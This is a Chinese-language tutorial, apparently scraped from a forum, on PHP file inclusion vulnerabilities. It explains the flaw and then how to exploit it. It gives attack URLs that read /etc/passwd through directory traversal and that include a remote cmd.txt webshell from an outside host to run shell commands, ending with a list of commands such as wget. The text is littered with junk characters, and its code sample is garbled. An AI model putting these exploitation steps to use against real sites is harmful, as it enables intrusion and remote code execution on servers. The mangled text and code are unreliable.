2 s. g$ Q; |$ w5 D' \二、为什么要包含文件 " j4 T" Q, k& q( S) ]5 R+ A0 K& K) z9 J! Q8 z
程序员写程序的时候,不喜欢干同样的事情,也不喜欢把同样的代码(比如一些公用的函数)写几次,于是就把需要公用的代码写在一个单独的文件里面,比如 share.php,而后在其它文件进行包含调用。在php里,我们就是使用上面列举的那几个函数来达到这个目的的,它的工作流程:如果你想在 main.php里包含share.php,我将这样写include("share.php")就达到目的,然后就可以使用share.php中的函数了,像这个写死需要包含的文件名称的自然没有什么问题,也不会出现漏洞,那么问题到底是出在哪里呢? ( p2 u: r9 Q J5 ~2 Z6 s' T! ?8 ]' [7 `有的时候可能不能确定需要包含哪个文件,比如先来看下面这个文件index.php的代码:! U% d3 ]. b+ z) B, o* E
6 c7 R G0 @: D( r) k$ W
CODE: [Copy to clipboard]+ I! m9 {5 S( Q. q, H' E
-------------------------------------------------------------------------------- ; d) ^2 H$ j2 g8 L& ` " z# o! e) ]. F/ L- o, fif () {2 w* r9 ^7 j( s- R; K' m* {( Z, e" b3 F
include GET;$ J( @" G% D+ n, z. C+ I7 V& G
} else {2 j T, J9 q5 k. I' f3 ?2 J' X
include "home., v( V2 f0 }9 _
}# i6 ?! N; m2 L* P
1 k( b9 p S1 ~* X1 b
很正常的一段PHP代码,它是怎么运作的呢?这里面涉及到GET的意义,我就不打算讲了(要不又能写篇HTTP的文章了),如果你还不了解GET,POST,等,那么你需要再Google一些相关的资料好好补一补了。% N f+ q0 L5 S. F) P
上面这段代码的使用格式可能是这样的:http://www.1steam.cn/php/index.php?page=main.php或者http: //www.1steam.cn/php/index.php?page=downloads.php ,结合上面代码,简单说下怎么运作的:1 ]8 f5 l7 z" f7 H
* f# l( h$ z+ \( `# v8 T& _
1.提交上面这个URL,在index.php中就取得这个page的值(_GET)。 0 |- k" @2 L. E9 Y; w' q2.判断GET是不是空,若不空(这里是main.php)就用include来包含这个文件。 ( G( o+ B* | \# M; Z3.若_GET空的话就执行else,来include home.php 这个文件。* p% {$ C/ \9 T
6 p, d9 G; `6 M! M2 I& R# {6 ^三、为什么会产生漏洞 - D% h) a6 v3 ]2 N+ x1 A) a O! P! E* k/ B; O4 q& F0 n X
你也许要说,这样很好呀,可以按照URL来动态包含文件,多么方便呀,怎么产生漏洞的呢?问题的答案是:我们不乖巧,我们总喜欢和别人不一样,我们不会按照他的链接来操作,我们可能想自己写想包含(调用)的文件,比如我们会随便的打入下面这个URL:http: //www.1steam.cn/php/index.php?page=hello.php。然后我们的index.php程序就傻傻按照上面我们说得步骤去执行:取page为hello.php,然后去include(hello.php),这时问题出现了,因为我们并没有hello.php这个文件,所以它 include的时候就会报警告,类似下列信息: ( o( O' L& j% a I8 ?) L1 i0 b 4 j) K2 j( E) L3 XQuote:( c9 n. e2 ]2 ~4 N' O5 N z& J& ~
Warning: include(hello.php) [function.include]: failed to open stream: No such file or directory in /vhost/wwwroot/php/index.php on line 3 . ?2 u2 Y2 s; u5 U' K# L4 S; q3 `Warning: include() [function.include]: Failed opening 'hello.php' for inclusion (include_path='.:') in /vhost/wwwroot/php/index.php on line 3 ( x0 k3 |: t+ U; n \/ t, n- `7 k
注意上面的那个Warning就是找不到我们指定的hello.php文件,也就是包含不到我们指定路径的文件;而后面的警告是因为前面没有找到指定文件,所以包含的时候就出警告了。+ K- z/ M; L& e* y
9 c$ I2 C3 }5 Y! B# f- L( S四、怎么利用! S N3 W5 t$ y) c" q/ Y
- z! Q0 k1 G$ x上面可以看到,问题出现了,那么我们怎么利用这样的漏洞呢,利用方法其实很多,但是实质上都是差不多的,我这里说三个比较常见的利用方法: & b2 b# x' t0 H; G' D* ? ; P. _- b) P" o+ ~1.包含读出目标机上其它文件 - g" Y% w% K3 _- n: f. U. R8 u; N
由前面我们可以看到,由于对取得的参数page没有过滤,于是我们可以任意指定目标主机上的其它敏感文件,例如在前面的警告中,我们可以看到暴露的绝对路径(vhost/wwwroot/php/),那么我们就可以多次探测来包含其它文件,比如指定URL为:http: //www.1steam.cn/php/index.php?page=./txt.txt 可以读出当前路径下的txt.txt文件,也可以使用.. /../进行目录跳转(在没过滤../的情况下);也可以直接指定绝对路径,读取敏感的系统文件,比如这个URL:http: //www.1steam.cn/php/index.php?page=/etc/passwd ,如果目标主机没有对权限限制的很严格,或者启动 Apache的权限比较高,是可以读出这个文件内容的。否则就会得到一个类似于:open_basedir restriction in effect.的Warning。" O0 B2 j& m$ i( _$ W: k1 G
* s# N9 t2 Y9 q ?" c3 G; m- C
2.包含可运行的PHP木马 ( ]5 O- v: l$ r6 e5 H# _2 H " J+ M- ^5 P) C1 {: `+ w如果目标主机的"allow_url_fopen"是激活的(默认是激活的,没几个人会修改),我们就可以有更大的利用空间,我们可以指定其它 URL上的一个包含PHP代码的webshell来直接运行,比如,我先写一段运行命令的PHP代码(加了注释,应该看得懂),如下保存为 cmd.txt(后缀不重要,只要内容为PHP格式就可以了)。8 h% \6 g( S# S$ ?, K0 z
# j0 G- F- D4 n6 r! I
以上这个文件的作用就是接受cmd指定的命令,并调用passthru函数执行,把内容返回在1.S.T之间。把这个文件保存到我们主机的服务器上(可以是不支持PHP的主机),只要能通过HTTP访问到就可以了,例如地址如下:http: //www.1ster.cn/cmd.txt ,然后我们就可以在那个漏洞主机上构造如下URL来利用了:http: //www.1steam.cn/php/index.php?page=http://www.1ster.cn/cmd.txt?cmd=ls ,其中 cmd后面的就是你需要执行的命令,其它常用的命令(以*UNIX为例)如下:$ o' Q2 P& @0 C- J6 r+ b
- F; w9 F4 m4 f$ A$ {" @
Quote: 9 r4 O3 B) M/ h6 Mll 列目录、文件(相当于Windows下dir): h# P4 a) ^0 Q- w- O4 w2 e: R
pwd 查看当前绝对路径* C9 s! s/ n( s- Y' k3 G. @5 }
id whoami 查看当前用户5 j# J6 x: e# Q/ D! Q" ]
wget 下载指定URL的文件- ^& {; i& a% D, D+ P; v1 u